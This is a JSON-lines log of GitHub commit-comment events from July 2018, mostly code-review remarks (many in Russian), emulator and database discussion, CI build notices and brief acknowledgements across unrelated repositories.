{"id":"7912270859","type":"CommitCommentEvent","actor":{"login":"OliverO2"},"repo":{"name":"rear/rear"},"payload":{"comment":{"id":29579979,"position":11,"line":76,"path":"usr/share/rear/output/RAWDISK/Linux-i386/280_create_bootable_disk_image.sh","commit_id":"bcb0ed3e01d5e9225c6e243bb4971de90ea3c57b","created_at":"2018-07-03T12:35:49Z","updated_at":"2018-07-03T12:35:49Z","author_association":"CONTRIBUTOR","body":"Done."}},"created_at":"2018-07-03T12:35:49Z"}
{"id":"7912271016","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29579980,"position":113,"line":113,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:35:51Z","updated_at":"2018-07-03T12:35:51Z","author_association":"NONE","body":"То же самое ко всем остальным инлайн стилям."}},"created_at":"2018-07-03T12:35:51Z"}
{"id":"7912274230","type":"CommitCommentEvent","actor":{"login":"visheshsanghani"},"repo":{"name":"visheshsanghani/Zoho-Geeks-for-geeks-archive"},"payload":{"comment":{"id":29579991,"position":null,"line":null,"path":null,"commit_id":"0bb20fff001043f2c31b22c6c294b97048257173","created_at":"2018-07-03T12:36:27Z","updated_at":"2018-07-03T12:36:27Z","author_association":"OWNER","body":"First commit"}},"created_at":"2018-07-03T12:36:27Z"}
{"id":"7912278197","type":"CommitCommentEvent","actor":{"login":"jers49"},"repo":{"name":"jers49/SiemLogicLibrary"},"payload":{"comment":{"id":29580006,"position":null,"line":null,"path":null,"commit_id":"1dca877925524675226e86c87351f29cf0590c42","created_at":"2018-07-03T12:37:13Z","updated_at":"2018-07-03T12:37:13Z","author_association":"OWNER","body":"new version"}},"created_at":"2018-07-03T12:37:13Z"}
{"id":"7912287849","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29580021,"position":null,"line":null,"path":null,"commit_id":"e7d1688ae54618c7711b0d28927794890b5eb88b","created_at":"2018-07-03T12:39:03Z","updated_at":"2018-07-03T12:39:03Z","author_association":"NONE","body":"I can now get NBA 2K to work, however, once it gets ingame it starts becoming very slow (like 4fps) before it seems to 'hang'. The FPS meter of RetroArch still iterates so the emulator itself has not hanged but video update and game progression seem to have stopped entirely."}},"created_at":"2018-07-03T12:39:03Z"}
{"id":"7912289070","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580029,"position":126,"line":126,"path":"hw4naz/App.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:39:16Z","updated_at":"2018-07-03T12:39:16Z","author_association":"NONE","body":"Пытаться придумать для каждого компонента названия-существительное – не очень масштабируемая практика.\r\n\r\nЛично мне кажется, проще и понятнее называть экраны по формату `<Verb><Noun>Screen`, `<Verb><Noun>Page` или что-нибудь наподобие этого."}},"created_at":"2018-07-03T12:39:16Z"}
{"id":"7912290019","type":"CommitCommentEvent","actor":{"login":"Aananda122"},"repo":{"name":"Aananda122/c-programming"},"payload":{"comment":{"id":29580033,"position":null,"line":null,"path":null,"commit_id":"7b2c666d5be5d10b147b83cdacc718cfff7c9c77","created_at":"2018-07-03T12:39:25Z","updated_at":"2018-07-03T12:39:25Z","author_association":"OWNER","body":"\r\n\r\n\r\n\r\n\r\n\r\n[New WinRAR ZIP archive.zip](https://github.com/Aananda122/c-programming/files/2159290/New.WinRAR.ZIP.archive.zip)\r\n"}},"created_at":"2018-07-03T12:39:25Z"}
{"id":"7912290892","type":"CommitCommentEvent","actor":{"login":"ai1045152332"},"repo":{"name":"ai1045152332/ZjyRepository"},"payload":{"comment":{"id":29580035,"position":null,"line":null,"path":null,"commit_id":"e33a602d9114765b5acfd55e69e324f5f204987c","created_at":"2018-07-03T12:39:34Z","updated_at":"2018-07-03T12:39:34Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T12:39:34Z"}
{"id":"7912294375","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580045,"position":1,"line":1,"path":"hw4naz/components/AssetExample.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:40:12Z","updated_at":"2018-07-03T12:40:12Z","author_association":"NONE","body":"Лишний компонент."}},"created_at":"2018-07-03T12:40:12Z"}
{"id":"7912295366","type":"CommitCommentEvent","actor":{"login":"CJ-Wright"},"repo":{"name":"regro/cf-scripts"},"payload":{"comment":{"id":29580046,"position":null,"line":null,"path":null,"commit_id":"7cf3d6442e5337bb1c499d0947b741d2782b0e50","created_at":"2018-07-03T12:40:22Z","updated_at":"2018-07-03T12:40:22Z","author_association":"MEMBER","body":"Thank you!"}},"created_at":"2018-07-03T12:40:22Z"}
{"id":"7912304891","type":"CommitCommentEvent","actor":{"login":"flyinghead"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29580071,"position":null,"line":null,"path":null,"commit_id":"e7d1688ae54618c7711b0d28927794890b5eb88b","created_at":"2018-07-03T12:42:08Z","updated_at":"2018-07-03T12:42:08Z","author_association":"OWNER","body":"I've noticed very slow frame rate with the OIT renderer due to translucent modifier volumes. I'm going to look into this.\r\nThe non-OIT seems to run fine and if I disable translucent modifier volumes in the OIT renderer, the frame rate returns to normalish."}},"created_at":"2018-07-03T12:42:08Z"}
{"id":"7912307409","type":"CommitCommentEvent","actor":{"login":"spumer"},"repo":{"name":"fidget123/nasdaq"},"payload":{"comment":{"id":29580074,"position":136,"line":136,"path":"web_view.py","commit_id":"9a1f923a814c2e7644705a78e55ec44ae6cdce05","created_at":"2018-07-03T12:42:35Z","updated_at":"2018-07-03T12:42:35Z","author_association":"NONE","body":"Это точно будет работать? Ты ведь не делаешь SELECT t1.id"}},"created_at":"2018-07-03T12:42:35Z"}
{"id":"7912308106","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580077,"position":11,"line":11,"path":"hw4naz/components/BalancePart.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:42:42Z","updated_at":"2018-07-03T12:42:42Z","author_association":"NONE","body":"В оригинальном Сплитвайзе символ `+` показывается только при показе общего баланса (колонки `total balance`). Для остальных колонок плюс не показывается."}},"created_at":"2018-07-03T12:42:42Z"}
{"id":"7912309681","type":"CommitCommentEvent","actor":{"login":"alexsegura"},"repo":{"name":"coopcycle/coopcycle-web"},"payload":{"comment":{"id":29580082,"position":23,"line":61,"path":"js/app/i18n/locales/en.json","commit_id":"a2f0b653aea9ba45799e84acccbd13c44423e133","created_at":"2018-07-03T12:42:59Z","updated_at":"2018-07-03T12:42:59Z","author_association":"MEMBER","body":"This is still in French 🇫🇷"}},"created_at":"2018-07-03T12:42:59Z"}
{"id":"7912310034","type":"CommitCommentEvent","actor":{"login":"alexsegura"},"repo":{"name":"coopcycle/coopcycle-web"},"payload":{"comment":{"id":29580085,"position":7,"line":46,"path":"js/app/restaurant/OrderList.jsx","commit_id":"a2f0b653aea9ba45799e84acccbd13c44423e133","created_at":"2018-07-03T12:43:04Z","updated_at":"2018-07-03T12:43:04Z","author_association":"MEMBER","body":"Should be `ORDER_LIST_PREPARATION_DATE `"}},"created_at":"2018-07-03T12:43:04Z"}
{"id":"7912312787","type":"CommitCommentEvent","actor":{"login":"bykoianko"},"repo":{"name":"mapsme/omim"},"payload":{"comment":{"id":29580093,"position":4,"line":6,"path":"routing/traffic_stash.cpp","commit_id":"2254c56e78fc61163a6e8cb137a31a774533ee4d","created_at":"2018-07-03T12:43:35Z","updated_at":"2018-07-03T12:43:35Z","author_association":"CONTRIBUTOR","body":"Готово"}},"created_at":"2018-07-03T12:43:35Z"}
{"id":"7912313722","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580096,"position":1,"line":1,"path":"hw4naz/components/Bar.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:43:46Z","updated_at":"2018-07-03T12:43:46Z","author_association":"NONE","body":"Есть ведь компонент `Toolbar` в react-native-paper – можно было использовать его."}},"created_at":"2018-07-03T12:43:46Z"}
{"id":"7912315310","type":"CommitCommentEvent","actor":{"login":"nitishdeveloper"},"repo":{"name":"nitishdeveloper/SpringSecurityServices"},"payload":{"comment":{"id":29580099,"position":null,"line":null,"path":null,"commit_id":"64425a5e6c400b9502b8cf852de5adc672ed32cb","created_at":"2018-07-03T12:44:03Z","updated_at":"2018-07-03T12:44:03Z","author_association":"OWNER","body":"done review"}},"created_at":"2018-07-03T12:44:03Z"}
{"id":"7912319845","type":"CommitCommentEvent","actor":{"login":"kptnMosz"},"repo":{"name":"kptnMosz/Warsztat_CRM"},"payload":{"comment":{"id":29580109,"position":6,"line":25,"path":".gitignore","commit_id":"56936b6541bdd09dc3f45a66cbe7b59ec91697c7","created_at":"2018-07-03T12:44:51Z","updated_at":"2018-07-03T12:44:51Z","author_association":"OWNER","body":"?"}},"created_at":"2018-07-03T12:44:51Z"}
{"id":"7912320541","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580112,"position":9,"line":9,"path":"hw4naz/components/Bar.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:44:59Z","updated_at":"2018-07-03T12:44:59Z","author_association":"NONE","body":"Не очень понятное название элемента. Если иконка показывает стрелку назад, то лучше было бы назвать `backButtonIcon` или `backIcon`."}},"created_at":"2018-07-03T12:44:59Z"}
{"id":"7912323354","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580123,"position":16,"line":16,"path":"hw4naz/components/Bar.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:45:29Z","updated_at":"2018-07-03T12:45:29Z","author_association":"NONE","body":"Тот же комментарий, что и выше."}},"created_at":"2018-07-03T12:45:29Z"}
{"id":"7912324705","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29580127,"position":null,"line":null,"path":null,"commit_id":"9940504e933d6766f87dca7fccc3c2f889976a22","created_at":"2018-07-03T12:45:43Z","updated_at":"2018-07-03T12:45:43Z","author_association":"COLLABORATOR","body":"@anthrotype if you have Win10 access, can you please test these sequences for me, with Nirmala.ttf, with --shaper=ot against --shaper=uniscribe?"}},"created_at":"2018-07-03T12:45:43Z"}
{"id":"7912326148","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29580134,"position":null,"line":null,"path":null,"commit_id":"087f147ab5af2687fee4d5eb48f4d4d60d8e98c9","created_at":"2018-07-03T12:45:59Z","updated_at":"2018-07-03T12:45:59Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-21](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-21-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T12:45:59Z"}
{"id":"7912326929","type":"CommitCommentEvent","actor":{"login":"kptnMosz"},"repo":{"name":"kptnMosz/Warsztat_CRM"},"payload":{"comment":{"id":29580137,"position":null,"line":null,"path":null,"commit_id":"56936b6541bdd09dc3f45a66cbe7b59ec91697c7","created_at":"2018-07-03T12:46:08Z","updated_at":"2018-07-03T12:46:08Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-03T12:46:08Z"}
{"id":"7912342455","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":29580176,"position":null,"line":null,"path":null,"commit_id":"f7309853ac516dbefaec608c3a339b1049fd2c4d","created_at":"2018-07-03T12:48:53Z","updated_at":"2018-07-03T12:48:53Z","author_association":"CONTRIBUTOR","body":"well balanced?...\r\nZigbert was annoyed when such a layout was provided as an alternative option, with some good [reasoning against it](http://www.murga-linux.com/puppy/viewtopic.php?p=825944#825944) "}},"created_at":"2018-07-03T12:48:53Z"}
{"id":"7912342646","type":"CommitCommentEvent","actor":{"login":"Anime4000"},"repo":{"name":"Anime4000/IFME"},"payload":{"comment":{"id":29580180,"position":null,"line":null,"path":null,"commit_id":"c7d5817a0925df2fc140a0dc40719325e7a1e623","created_at":"2018-07-03T12:48:55Z","updated_at":"2018-07-03T12:48:55Z","author_association":"OWNER","body":"you want HEVC Level?"}},"created_at":"2018-07-03T12:48:55Z"}
{"id":"7912343433","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580183,"position":24,"line":24,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:49:04Z","updated_at":"2018-07-03T12:49:04Z","author_association":"NONE","body":"Не очень дескриптивное название поля. Лучше было бы `involvedFriendIndices`, `involvedFriendIndexes` или что-то подобное."}},"created_at":"2018-07-03T12:49:04Z"}
{"id":"7912345549","type":"CommitCommentEvent","actor":{"login":"aspatari"},"repo":{"name":"OlyaRemez/js"},"payload":{"comment":{"id":29580189,"position":35,"line":25,"path":"Cafe/Furniture/Furniture.ts","commit_id":"cdeb4a92d7d846061f6498ef9919097a3fadcb29","created_at":"2018-07-03T12:49:27Z","updated_at":"2018-07-03T12:49:27Z","author_association":"COLLABORATOR","body":"что это за форматирование кода "}},"created_at":"2018-07-03T12:49:27Z"}
{"id":"7912348372","type":"CommitCommentEvent","actor":{"login":"mathud1"},"repo":{"name":"mathud1/Sorting-Algorithms"},"payload":{"comment":{"id":29580198,"position":null,"line":null,"path":null,"commit_id":"34442e903da5eca87a000b8dfd4ce04fe16816c0","created_at":"2018-07-03T12:49:58Z","updated_at":"2018-07-03T12:49:58Z","author_association":"OWNER","body":"Draft of heap sorting algorithm"}},"created_at":"2018-07-03T12:49:58Z"}
{"id":"7912355516","type":"CommitCommentEvent","actor":{"login":"exmackina"},"repo":{"name":"Irstea/collec"},"payload":{"comment":{"id":29580222,"position":null,"line":null,"path":null,"commit_id":"13686a44794a601680db6fabd5723935a6af5183","created_at":"2018-07-03T12:51:16Z","updated_at":"2018-07-03T12:51:16Z","author_association":"COLLABORATOR","body":"fixes #209 "}},"created_at":"2018-07-03T12:51:16Z"}
{"id":"7912359133","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"flyinghead/reicast-emulator"},"payload":{"comment":{"id":29580229,"position":null,"line":null,"path":null,"commit_id":"295395c680402978cc61f42aa0e156dd59df3b79","created_at":"2018-07-03T12:51:57Z","updated_at":"2018-07-03T12:51:57Z","author_association":"NONE","body":"OK, I will make flat shading optional then if it can help claw back some performance."}},"created_at":"2018-07-03T12:51:57Z"}
{"id":"7912360576","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580234,"position":25,"line":25,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:52:12Z","updated_at":"2018-07-03T12:52:12Z","author_association":"NONE","body":"Платить ведь может только один человек – зачем тут массив?\r\n\r\nИ та же проблема с названием переменной – было бы лучше использовать что-то вроде `paidFriendIndex` или `paidFriendIdx`."}},"created_at":"2018-07-03T12:52:12Z"}
{"id":"7912360923","type":"CommitCommentEvent","actor":{"login":"aboletti"},"repo":{"name":"cms-bph-trigger/cmssw"},"payload":{"comment":{"id":29580235,"position":1525,"line":1169,"path":"DQMOffline/Trigger/plugins/BPHMonitor.cc","commit_id":"3caf1135058b17d28ad6fc81a1d22afdf20f7b45","created_at":"2018-07-03T12:52:16Z","updated_at":"2018-07-03T12:52:16Z","author_association":"MEMBER","body":"It is not wrong, but it is also a not-needed approximation, so if the two solutions are equivalent for the rest of the process, I would opt for the decimal values.\r\nIf you agree, I will prepare the commit for the integration branch"}},"created_at":"2018-07-03T12:52:16Z"}
{"id":"7912367817","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580247,"position":5,"line":1360,"path":"storage/innobase/include/dict0mem.h","commit_id":"63100ae20beff8b2d3dbc0f2809005a81d1dfe46","created_at":"2018-07-03T12:53:29Z","updated_at":"2018-07-03T12:53:29Z","author_association":"CONTRIBUTOR","body":"The function body consists of a single statement. Please move it from dict0dict.ic to here:\r\n```c++\r\n\tinline int32 get_ref_count()\r\n\t{\r\n\t\treturn my_atomic_load32_explicit(&n_ref_count,\r\n\t\t\t\t\t\t MY_MEMORY_ORDER_RELAXED);\r\n\t}\r\n```\r\nThe other `n_ref_count` accessors cannot be moved, because `dict_sys` or `dict_sys->mutex` are not available in this file."}},"created_at":"2018-07-03T12:53:29Z"}
{"id":"7912369485","type":"CommitCommentEvent","actor":{"login":"tsaulic"},"repo":{"name":"Alexpux/MSYS2-packages"},"payload":{"comment":{"id":29580249,"position":null,"line":null,"path":null,"commit_id":"021ab57ef898064426254e02ddb71769607db1bb","created_at":"2018-07-03T12:53:45Z","updated_at":"2018-07-03T12:53:45Z","author_association":"NONE","body":"🙇  thank you"}},"created_at":"2018-07-03T12:53:45Z"}
{"id":"7912372275","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580261,"position":32,"line":1526,"path":"storage/innobase/include/dict0dict.ic","commit_id":"63100ae20beff8b2d3dbc0f2809005a81d1dfe46","created_at":"2018-07-03T12:54:12Z","updated_at":"2018-07-03T12:54:12Z","author_association":"CONTRIBUTOR","body":"You could remove one TAB from the start of this line."}},"created_at":"2018-07-03T12:54:12Z"}
{"id":"7912373894","type":"CommitCommentEvent","actor":{"login":"rajeevr2715"},"repo":{"name":"tmobile/jazz-installer"},"payload":{"comment":{"id":29580265,"position":85,"line":124,"path":"installscripts/cookbooks/jenkins/recipes/configurejenkins.rb","commit_id":"9dd37ae52cedcee36f849724f8db8c75a7e4d32e","created_at":"2018-07-03T12:54:29Z","updated_at":"2018-07-03T12:54:29Z","author_association":"COLLABORATOR","body":"@bleggett Got an error after re-running the stack ,\r\n\r\n> \u001b[0m\u001b[0mnull_resource.chef_provision_jenkins_server (remote-exec): \u001b[0m  * execute[createcredentials-bitbucket] action run[2018-07-03T11:34:55+00:00] INFO: Processing execute[createcredentials-bitbucket] action run (jenkins::configurejenkins line 139)\r\n\u001b[0m\u001b[0m\r\n\u001b[0m\u001b[0mnull_resource.chef_provision_jenkins_server (remote-exec):     [execute] No change\r\n\u001b[0m\u001b[0mnull_resource.chef_provision_jenkins_server (remote-exec):     \u001b[0m\r\n\u001b[0m\u001b[0mnull_resource.chef_provision_jenkins_server (remote-exec):     ================================================================================\u001b[0m\r\n\u001b[0m\u001b[0mnull_resource.chef_provision_jenkins_server (remote-exec):     \u001b[31mError executing action `run` on resource 'execute[createcredentials-bitbucket]'\u001b[0m\r\n\u001b[0m\u001b[0mnull_resource.chef_provision_jenkins_server (remote-exec):     ================================================================================\u001b[0m"}},"created_at":"2018-07-03T12:54:29Z"}
{"id":"7912374433","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29580274,"position":null,"line":null,"path":null,"commit_id":"63100ae20beff8b2d3dbc0f2809005a81d1dfe46","created_at":"2018-07-03T12:54:35Z","updated_at":"2018-07-03T12:54:35Z","author_association":"CONTRIBUTOR","body":"This looks OK. I only have minor comments about formatting or coding style."}},"created_at":"2018-07-03T12:54:35Z"}
{"id":"7912376192","type":"CommitCommentEvent","actor":{"login":"mikehardy"},"repo":{"name":"requery/sqlite-android"},"payload":{"comment":{"id":29580276,"position":null,"line":null,"path":null,"commit_id":"6f2070b16a4fbbdcd24c5a4423ded981ef3c5c08","created_at":"2018-07-03T12:54:53Z","updated_at":"2018-07-03T12:54:53Z","author_association":"NONE","body":"@npurushe - this is a very late comment and I may be misunderstanding something, but as I work through upgrading AnkiDroid dependencies, I'm stumped taking requery/sqlite-android past 3.16 because this commit removes NO_LOCALIZED_COLLATORS, which is still present in the system implementation and is used by our project:\r\n\r\nhttps://developer.android.com/reference/android/database/sqlite/SQLiteDatabase#NO_LOCALIZED_COLLATORS\r\n\r\nIf I were to stop opening our database with this flag, would that imply that databases created prior to the change with the flag will potentially have different locale settings than are being used to query it? Is that inconsistency problematic or is it safe to remove the flag and carry on?\r\n\r\nI saw no discussion anywhere with searching so I'm guessing it's not a problem but we have a huge installed base with lots of languages and versions...\r\n\r\nThanks!"}},"created_at":"2018-07-03T12:54:53Z"}
{"id":"7912377607","type":"CommitCommentEvent","actor":{"login":"yenbekbay"},"repo":{"name":"yegemberdin/hworks"},"payload":{"comment":{"id":29580281,"position":30,"line":30,"path":"hw4naz/components/BillAdder.js","commit_id":"f119bf1b6c7ac3d9ac8b1b08e37c9fa5a75b4282","created_at":"2018-07-03T12:55:09Z","updated_at":"2018-07-03T12:55:09Z","author_association":"NONE","body":"Нестандартное и неясное название для хэндлера. Тут подошло бы лучше что-то вроде `handleToggleInvolvedFriend` или хотя бы просто `toggleInvolvedFriend`. Идеально было бы `handleToggleInvolvedFriendAtIndex`, но это может показаться слишком длинным."}},"created_at":"2018-07-03T12:55:09Z"}
{"id":"7912381793","type":"CommitCommentEvent","actor":{"login":"absrelax"},"repo":{"name":"absrelax/Itvdnhtmlcourse.io"},"payload":{"comment":{"id":29580296,"position":null,"line":null,"path":null,"commit_id":"48cc97c2c0498a78a353240fd55b509036dd3992","created_at":"2018-07-03T12:55:53Z","updated_at":"2018-07-03T12:55:53Z","author_association":"OWNER","body":"w"}},"created_at":"2018-07-03T12:55:53Z"}
{"id":"7912384380","type":"CommitCommentEvent","actor":{"login":"khusika"},"repo":{"name":"android-linux-stable/msm-3.18"},"payload":{"comment":{"id":29580302,"position":null,"line":null,"path":null,"commit_id":"8f021777cd74076d941625b5341d3e3cc2679548","created_at":"2018-07-03T12:56:19Z","updated_at":"2018-07-03T12:56:19Z","author_association":"NONE","body":"seems like this changes is missing in the last merge of 3.18.114, and nothing defined about revert or remove this line. Or did i missed something? @nathanchance  :/"}},"created_at":"2018-07-03T12:56:19Z"}
{"id":"7912385817","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29580307,"position":null,"line":null,"path":null,"commit_id":"b943ec7d7f026aa261bbcf6494b46246a08c71b0","created_at":"2018-07-03T12:56:34Z","updated_at":"2018-07-03T12:56:34Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-21](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-21).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-21-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-03T12:56:34Z"}
{"id":"7912387544","type":"CommitCommentEvent","actor":{"login":"flurin-conradin"},"repo":{"name":"flurin-conradin/test-webhooks"},"payload":{"comment":{"id":29580310,"position":null,"line":null,"path":null,"commit_id":"38014d8ec184643d907de2a3c66974d42c8287fe","created_at":"2018-07-03T12:56:53Z","updated_at":"2018-07-03T12:56:53Z","author_association":"OWNER","body":"even some more changes"}},"created_at":"2018-07-03T12:56:53Z"}
{"id":"7912392373","type":"CommitCommentEvent","actor":{"login":"martinayotte"},"repo":{"name":"armbian/build"},"payload":{"comment":{"id":29580316,"position":null,"line":null,"path":null,"commit_id":"ede66919cf0d18783a9b2ee2ee67c7fbf2f5d19f","created_at":"2018-07-03T12:57:44Z","updated_at":"2018-07-03T12:57:44Z","author_association":"CONTRIBUTOR","body":"Ah ! Ok ! I took a magnifier and you're right, I now see the pads that doesn't touch any pin on the chip, since it is a BGA ...\r\n\r\nSo, I need to figure out why it is working fine with the kernel patch https://github.com/armbian/build/commit/174953de1eb09e6aa1ef7075066b573dba625398 , but U-Boot with similar above patch is unable to read partitions table."}},"created_at":"2018-07-03T12:57:44Z"}
{"id":"7912394290","type":"CommitCommentEvent","actor":{"login":"Bowman205"},"repo":{"name":"CCQC/summer-program"},"payload":{"comment":{"id":29580322,"position":31,"line":31,"path":"1/rkm79791/project1.py","commit_id":"14fb00090221769ff194272268db8f0e313fa42d","created_at":"2018-07-03T12:58:05Z","updated_at":"2018-07-03T12:58:05Z","author_association":"CONTRIBUTOR","body":"A useful tip for commenting code with these programming projects is to include a comment for each number in the procedure. This makes it very clear (to both of us) how your code follows the instructions."}},"created_at":"2018-07-03T12:58:05Z"}
{"id":"7912395445","type":"CommitCommentEvent","actor":{"login":"djahandarie"},"repo":{"name":"djahandarie/tokio-imap"},"payload":{"comment":{"id":29580332,"position":null,"line":null,"path":null,"commit_id":"48b881720c5e37acdf72f7b37bcc626018aa35d5","created_at":"2018-07-03T12:58:18Z","updated_at":"2018-07-03T12:58:18Z","author_association":"OWNER","body":"Haha, thanks! Yes! Just wanted to test it a bit more fully before doing so. :)"}},"created_at":"2018-07-03T12:58:18Z"}
{"id":"7912398483","type":"CommitCommentEvent","actor":{"login":"dbogdan"},"repo":{"name":"analogdevicesinc/linux"},"payload":{"comment":{"id":29580341,"position":465,"line":465,"path":"drivers/iio/frequency/hmc7044.c","commit_id":"17aa144bfb1c1ffac4bd58762d09ee70813e9079","created_at":"2018-07-03T12:58:51Z","updated_at":"2018-07-03T12:58:51Z","author_association":"CONTRIBUTOR","body":"Right... I've pushed a newer version."}},"created_at":"2018-07-03T12:58:51Z"}
{"id":"7912398709","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29580347,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-03T12:58:53Z","updated_at":"2018-07-03T12:58:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T12:58:53Z"}
{"id":"7912400452","type":"CommitCommentEvent","actor":{"login":"huewilliams"},"repo":{"name":"huewilliams/learning-python"},"payload":{"comment":{"id":29580354,"position":null,"line":null,"path":null,"commit_id":"2b67647d1e7d74c973ec9eec9a6e6421c24334de","created_at":"2018-07-03T12:59:12Z","updated_at":"2018-07-03T12:59:12Z","author_association":"OWNER","body":"chapter1\r\n"}},"created_at":"2018-07-03T12:59:12Z"}
{"id":"7912400533","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29580355,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-03T12:59:13Z","updated_at":"2018-07-03T12:59:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-03T12:59:13Z"}
{"id":"7912400849","type":"CommitCommentEvent","actor":{"login":"dbogdan"},"repo":{"name":"analogdevicesinc/linux"},"payload":{"comment":{"id":29580357,"position":499,"line":499,"path":"drivers/iio/frequency/hmc7044.c","commit_id":"17aa144bfb1c1ffac4bd58762d09ee70813e9079","created_at":"2018-07-03T12:59:16Z","updated_at":"2018-07-03T12:59:16Z","author_association":"CONTRIBUTOR","body":"That's also correct."}},"created_at":"2018-07-03T12:59:16Z"}
